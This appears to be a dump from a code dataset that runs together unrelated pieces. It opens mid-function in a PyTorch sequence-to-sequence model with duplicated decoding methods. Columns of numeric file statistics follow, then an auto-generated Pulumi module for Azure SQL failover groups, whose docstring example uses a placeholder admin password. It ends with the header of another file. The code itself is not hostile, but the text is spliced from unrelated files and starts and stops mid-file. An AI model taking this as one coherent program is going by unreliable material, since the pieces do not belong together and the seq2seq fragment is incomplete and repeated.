emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden, context = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
outputs.append(output)
dist = F.softmax(self.generator(output))
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
class Seq2SeqModel(nn.Module):
def __init__(self, encoder, decoder, generator, opt):
super(Seq2SeqModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def initialize(self, inputs, eval):
src = inputs[0]
tgt = inputs[2]
enc_hidden, context = self.encoder(src)
init_output = self.make_init_decoder_output(context)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]), self._fix_enc_hidden(enc_hidden[1]))
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_output = init_output.cuda()
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden, context.transpose(0, 1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
emb, output, hidden, context = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
if self.opt.predict_mask:
block_src = torch.tensor([-np.inf] * batch_size).view(-1, 1)
block_mask = torch.zeros(batch_size, self.decoder.word_lut.num_embeddings, dtype=torch.float32)
if self.opt.cuda:
block_src = block_src.cuda()
block_mask = block_mask.cuda()
block_mask[:, lib.Constants.UNK] = -np.inf
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
logit = self.generator(output)
if self.opt.predict_mask: # block repetitive words (except BOS, EOS) and UNK
logit += block_mask
pred = logit.max(1)[1].view(-1).data
# update mask
block_mask.scatter_(1, pred.view(-1, 1), block_src)
block_mask[:, lib.Constants.BOS] = 0.0
block_mask[:, lib.Constants.EOS] = 0.0
else:
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden, context = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
outputs.append(output)
logit = self.generator(output)
dist = F.softmax(logit, dim=-1)
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
# emb = self.decoder.embedding(sample.unsqueeze(1).cpu().numpy()).squeeze(1)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
| 39.782258
| 144
| 0.605861
| 4,464
| 34,531
| 4.510529
| 0.058692
| 0.023839
| 0.012416
| 0.01182
| 0.824385
| 0.808393
| 0.79116
| 0.781723
| 0.768165
| 0.753464
| 0
| 0.010617
| 0.277142
| 34,531
| 867
| 145
| 39.828143
| 0.796042
| 0.12302
| 0
| 0.747218
| 0
| 0
| 0.003082
| 0.003082
| 0
| 0
| 0
| 0
| 0.007949
| 1
| 0.085851
| false
| 0
| 0.017488
| 0.004769
| 0.197138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5033db29996672c083ed0202c7201efb9159b24
| 30,443
|
py
|
Python
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FailoverGroupArgs', 'FailoverGroup']
@pulumi.input_type
class FailoverGroupArgs:
def __init__(__self__, *,
partner_servers: pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]],
read_write_endpoint_failover_policy: pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'],
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a FailoverGroup resource.
:param pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs'] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "partner_servers", partner_servers)
pulumi.set(__self__, "read_write_endpoint_failover_policy", read_write_endpoint_failover_policy)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if name is not None:
pulumi.set(__self__, "name", name)
if readonly_endpoint_failover_policy is not None:
pulumi.set(__self__, "readonly_endpoint_failover_policy", readonly_endpoint_failover_policy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@partner_servers.setter
def partner_servers(self, value: pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]):
pulumi.set(self, "partner_servers", value)
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@read_write_endpoint_failover_policy.setter
def read_write_endpoint_failover_policy(self, value: pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']):
pulumi.set(self, "read_write_endpoint_failover_policy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@readonly_endpoint_failover_policy.setter
def readonly_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]):
pulumi.set(self, "readonly_endpoint_failover_policy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _FailoverGroupState:
def __init__(__self__, *,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering FailoverGroup resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] location: the location of the failover group.
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs'] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] role: local replication role of the failover group instance.
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if databases is not None:
pulumi.set(__self__, "databases", databases)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if partner_servers is not None:
pulumi.set(__self__, "partner_servers", partner_servers)
if read_write_endpoint_failover_policy is not None:
pulumi.set(__self__, "read_write_endpoint_failover_policy", read_write_endpoint_failover_policy)
if readonly_endpoint_failover_policy is not None:
pulumi.set(__self__, "readonly_endpoint_failover_policy", readonly_endpoint_failover_policy)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if role is not None:
pulumi.set(__self__, "role", role)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
the location of the failover group.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@partner_servers.setter
def partner_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]]):
pulumi.set(self, "partner_servers", value)
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@read_write_endpoint_failover_policy.setter
def read_write_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]):
pulumi.set(self, "read_write_endpoint_failover_policy", value)
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@readonly_endpoint_failover_policy.setter
def readonly_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]):
pulumi.set(self, "readonly_endpoint_failover_policy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
local replication role of the failover group instance.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class FailoverGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Create a failover group of databases on a collection of Azure SQL servers.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
primary = azure.sql.SqlServer("primary",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
secondary = azure.sql.SqlServer("secondary",
resource_group_name=example_resource_group.name,
location="northeurope",
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
db1 = azure.sql.Database("db1",
resource_group_name=primary.resource_group_name,
location=primary.location,
server_name=primary.name)
example_failover_group = azure.sql.FailoverGroup("exampleFailoverGroup",
resource_group_name=primary.resource_group_name,
server_name=primary.name,
databases=[db1.id],
partner_servers=[azure.sql.FailoverGroupPartnerServerArgs(
id=secondary.id,
)],
read_write_endpoint_failover_policy=azure.sql.FailoverGroupReadWriteEndpointFailoverPolicyArgs(
mode="Automatic",
grace_minutes=60,
))
```
## Import
SQL Failover Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:sql/failoverGroup:FailoverGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Sql/servers/myserver/failovergroups/group1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FailoverGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a failover group of databases on a collection of Azure SQL servers.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
primary = azure.sql.SqlServer("primary",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
secondary = azure.sql.SqlServer("secondary",
resource_group_name=example_resource_group.name,
location="northeurope",
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
db1 = azure.sql.Database("db1",
resource_group_name=primary.resource_group_name,
location=primary.location,
server_name=primary.name)
example_failover_group = azure.sql.FailoverGroup("exampleFailoverGroup",
resource_group_name=primary.resource_group_name,
server_name=primary.name,
databases=[db1.id],
partner_servers=[azure.sql.FailoverGroupPartnerServerArgs(
id=secondary.id,
)],
read_write_endpoint_failover_policy=azure.sql.FailoverGroupReadWriteEndpointFailoverPolicyArgs(
mode="Automatic",
grace_minutes=60,
))
```
## Import
SQL Failover Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:sql/failoverGroup:FailoverGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Sql/servers/myserver/failovergroups/group1
```
:param str resource_name: The name of the resource.
:param FailoverGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FailoverGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FailoverGroupArgs.__new__(FailoverGroupArgs)
__props__.__dict__["databases"] = databases
__props__.__dict__["name"] = name
if partner_servers is None and not opts.urn:
raise TypeError("Missing required property 'partner_servers'")
__props__.__dict__["partner_servers"] = partner_servers
if read_write_endpoint_failover_policy is None and not opts.urn:
raise TypeError("Missing required property 'read_write_endpoint_failover_policy'")
__props__.__dict__["read_write_endpoint_failover_policy"] = read_write_endpoint_failover_policy
__props__.__dict__["readonly_endpoint_failover_policy"] = readonly_endpoint_failover_policy
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
__props__.__dict__["tags"] = tags
__props__.__dict__["location"] = None
__props__.__dict__["role"] = None
super(FailoverGroup, __self__).__init__(
'azure:sql/failoverGroup:FailoverGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FailoverGroup':
"""
Get an existing FailoverGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] location: the location of the failover group.
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] role: local replication role of the failover group instance.
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FailoverGroupState.__new__(_FailoverGroupState)
__props__.__dict__["databases"] = databases
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["partner_servers"] = partner_servers
__props__.__dict__["read_write_endpoint_failover_policy"] = read_write_endpoint_failover_policy
__props__.__dict__["readonly_endpoint_failover_policy"] = readonly_endpoint_failover_policy
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["role"] = role
__props__.__dict__["server_name"] = server_name
__props__.__dict__["tags"] = tags
return FailoverGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
the location of the failover group.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> pulumi.Output[Sequence['outputs.FailoverGroupPartnerServer']]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> pulumi.Output['outputs.FailoverGroupReadWriteEndpointFailoverPolicy']:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> pulumi.Output['outputs.FailoverGroupReadonlyEndpointFailoverPolicy']:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
local replication role of the failover group instance.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 48.553429
| 216
| 0.680452
| 3,355
| 30,443
| 5.935618
| 0.063785
| 0.087828
| 0.055539
| 0.042684
| 0.891182
| 0.88149
| 0.856182
| 0.843929
| 0.832932
| 0.817666
| 0
| 0.003932
| 0.223105
| 30,443
| 626
| 217
| 48.63099
| 0.838062
| 0.332162
| 0
| 0.68997
| 1
| 0
| 0.17414
| 0.115699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161094
| false
| 0.00304
| 0.021277
| 0
| 0.279635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d200ca2e203fa3f3e32cd70794d14a33d7e2d04b
| 3,710
|
py
|
Python
|
New folder/Assignment4.py
|
piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
New folder/Assignment4.py
|
piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
New folder/Assignment4.py
|
